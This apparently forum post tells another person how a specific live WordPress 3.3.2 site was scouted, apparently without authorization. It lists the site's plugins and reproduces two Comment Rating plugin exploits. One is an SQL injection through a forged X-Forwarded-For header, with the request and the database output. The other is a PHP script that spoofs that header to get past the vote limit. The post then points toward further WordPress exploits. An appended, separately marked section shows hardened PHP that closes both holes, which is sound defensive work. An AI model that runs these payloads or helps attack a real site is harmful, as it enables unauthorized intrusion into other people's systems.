Look, on the same site I was trying to find some SQL injection that doesn't require user registration, like the one you found, and I came across this one:
wp-content/plugins/comment-rating/ck-processkarma.php
If you go to wp-register you'll see the WordPress registration form (it's a 3.3.2), and once you log in you'll see the WordPress user panel; if you take a look at the page source you can see most of its plugins:
....../wp-admin/load-styles.php?c=1&dir=ltr&load=admin-bar,wp-admin,wp-pointer&ver=1747f87854de3d4df3fdb74e9ef12757
....../wp-content/plugins/w3-total-cache/pub/css/widget.css?ver=3.3.2
....../wp-includes/js/thickbox/thickbox.css?ver=20111117
....../wp-admin/css/colors-fresh.css?ver=20111206
....../wp-admin/css/ie.css?ver=20111130
....../wp-content/plugins/youtube-embed/css/aye-admin.css?ver=3.3.2
....../wp-content/plugins/youtube-embed/css/aye-dynamic.css?ver=3.3.2
....../wp-content/plugins/youtube-embed/css/aye-tinymce-button.css?ver=3.3.2
....../wp-admin/load-scripts.php?c=1&load=jquery,utils&ver=edec3fab0cb6297ea474806db1895fa7
....../wp-content/plugins/comment-rating/ck-karma.js?ver=3.3.2
....../wp-content/plugins/w3-total-cache/pub/js/metadata.js?ver=3.3.2
....../wp-content/plugins/w3-total-cache/pub/js/widget.js?ver=3.3.2
....../wp-content/plugins/microkids-related-posts/microkids-related-posts.js
The ones that stand out most for their vulnerabilities are w3-total-cache and comment-rating, but the total cache one doesn't work because directory listing is not enabled (otherwise we would already have the db); the comment-rating one can be exploited:
http://webcache.googleusercontent.com/search?q=cache:Y5z03qapzdQJ:www.exploit-db.com/exploits/24552/+&cd=1&hl=es&ct=clnk&gl=cl&client=firefox-a
# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
First, it takes the IP from the HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}
Later it makes an UPDATE without filtering the input.
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";
So let's take a look at the DB:
mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
| 2 | ,20.209.10.130 | 1 | 0 |
| 3 | | 0 | 0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)
Now make an HTTP request with an injection in the HTTP_X_FORWARDED_FOR header:
GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive
And the result is:
mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
| 2 | wordpress@localhost | 2 | 0 |
| 3 | | 0 | 0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)
Cheers
=======================================================================================
# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
First, it takes the IP from the HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}
Later it makes an UPDATE without filtering the input.
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";
Now, to bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request.
A simple PoC is written in PHP.
<?php
define('HOST', 'http://localhost/wordpress/');
define('IDCOMMENT', 2);   // comment id to vote on; 2 is the id used in the request above
$url = parse_url(HOST);   // missing in the posted PoC, but lvlup() reads $url['host'] and $url['path']
define('URL', $url['path'] . 'wp-content/plugins/comment-rating/ck-processkarma.php?id=' . IDCOMMENT
    . '&action=add&path=a&imgIndex=1_14_');
for ($i = 0; $i < 1; $i++) lvlup();
function lvlup() {
    global $url;
    $header  = "GET " . URL . " HTTP/1.1\r\n";
    $header .= "Host: " . $url['host'] . "\r\n";
    $header .= "Accept-Encoding: gzip, deflate\r\n";
    // a fresh random X-Forwarded-For on every request, so strstr() never matches a stored IP
    $header .= "X-Forwarded-For: " . long2ip(rand(0, "4294967295")) . "\r\n";
    $header .= "Connection: close\r\n\r\n";
    // the posted PoC built the request but never sent it; a plain socket send on port 80 is assumed here
    $fp = fsockopen($url['host'], 80, $errno, $errstr, 5);
    if (!$fp) die("$errstr ($errno)\n");
    fwrite($fp, $header);
    fclose($fp);
}
?>
The problem is that it's a very, very difficult injection to get anything useful out of and gain some privileges with, since it sits inside an UPDATE and you can't chain a second statement to do another UPDATE or an INSERT and make your user an administrator; the only thing you can do is put a SELECT in parentheses, but the results go straight into a database column you never see, so it's not much use.
Take a look at the WordPress vulnerabilities for the versions between the one installed and the latest stable one.
I think there was an exploit that took advantage of the pingback or xmlrpc, I don't remember exactly.
Regards.
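As an added example that is not part of the post or of the plugin: a hardened version of the two fragments of ck-processkarma.php quoted in the advisory, showing how both the injection and the vote-limit bypass are closed. The function names and the $trusted_proxies list are assumptions; $wpdb is WordPress's database object.

```php
<?php
// Added example (not the plugin's code): hardened replacements for the two
// fragments of ck-processkarma.php quoted above. Function names and the
// $trusted_proxies list are assumptions; $wpdb is WordPress's DB object.

function ck_valid_direction($direction) {
    // The column suffix comes from a fixed allow-list, never from the request.
    return in_array($direction, array('up', 'down'), true);
}

// 1. Only trust X-Forwarded-For when the request arrived through a proxy we
//    run. Any client can set the header, so on a direct connection the only
//    usable value is REMOTE_ADDR.
function ck_client_ip(array $trusted_proxies) {
    $remote = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    $xff    = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : '';
    if ($xff !== '' && in_array($remote, $trusted_proxies, true)) {
        // Each proxy appends its own hop; the first entry is the original client.
        $parts  = array_map('trim', explode(',', $xff));
        $remote = $parts[0];
    }
    // Whatever is chosen must parse as an IP address, so a value such as
    // "', ck_ips=(select user()) WHERE ck_comment_id=2#" is discarded here.
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '';
}

// 2. Never splice request data into SQL: $wpdb->prepare() quotes %s and casts %d.
//    $table_name is the plugin's own $wpdb->prefix-based name, not user input.
function ck_record_vote($table_name, $k_id, $direction, $rating, array $ips) {
    global $wpdb;
    if (!ck_valid_direction($direction)) {
        return false;
    }
    $ck_ips = ',' . implode(',', $ips);   // same ",ip1,ip2" layout the plugin stores
    $sql = $wpdb->prepare(
        "UPDATE `$table_name` SET ck_rating_$direction = %d, ck_ips = %s WHERE ck_comment_id = %d",
        (int) $rating, $ck_ips, (int) $k_id
    );
    return $wpdb->query($sql);
}

// Both pieces together for one vote: an empty IP means "do not count it".
function ck_process_vote($table_name, $k_id, $direction, $row, array $trusted_proxies) {
    $ip = ck_client_ip($trusted_proxies);
    if ($ip === '' || !ck_valid_direction($direction)) {
        return false;
    }
    $ips = array_filter(explode(',', $row['ck_ips']));
    if (in_array($ip, $ips, true)) {      // exact match instead of strstr()
        return false;                     // duplicate vote, not counted
    }
    $ips[] = $ip;
    $rating = (int) $row['ck_rating_' . $direction] + 1;
    return ck_record_vote($table_name, $k_id, $direction, $rating, $ips);
}
```

With REMOTE_ADDR as the fallback, a client that does not come through a trusted proxy can no longer choose its own IP per request, which closes the vote-limit bypass as well as the injection.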